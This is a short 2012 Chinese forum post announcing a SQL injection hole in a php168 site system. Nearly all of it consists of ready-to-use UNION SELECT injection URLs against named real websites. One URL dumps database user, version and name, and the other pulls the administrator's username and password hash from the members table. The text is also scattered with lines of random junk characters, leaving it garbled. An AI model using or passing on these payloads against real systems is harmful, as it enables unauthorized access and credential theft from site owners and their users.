找回密码
 立即注册
查看: 3430|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
) {2 a6 B1 {) w# o7 m1 I& @                                                         * k3 Q) ~8 e! I9 d# \" @
                                       - \! M+ J) N! z( I+ w+ I

' w8 ], w, V* x: P. P9 _: p
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--5 }  g, J. \" t, D& ?
                                                     % v1 @9 E5 n8 z, |0 V8 Z) o7 b3 z
                                                                   ) k+ A2 D5 b2 u* L: o
                                                        
/ F7 n) R' Y& Z+ ]http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--3 D, X1 C+ I0 f. Q# Y% n# ~/ _
2 k& F# R" b' z
0 y, o9 W4 C0 Y( o6 J7 d  {
2 E8 j6 C* L; k+ A7 |/ x
                                                            , O1 a8 i4 _5 _, s- h8 M
! ^- t$ y/ Y% u' O2 ?* p! X
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--& B/ K2 {$ u$ q, O+ g* ?3 g- Q9 s
1 |  X, }0 ~0 n. _

5 M0 S" l" A  F" ^
( ^0 e8 B$ Q: _9 t% f) r                                                                    
9 W. }- i: }- n4 ?2 s5 y% c2 i

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表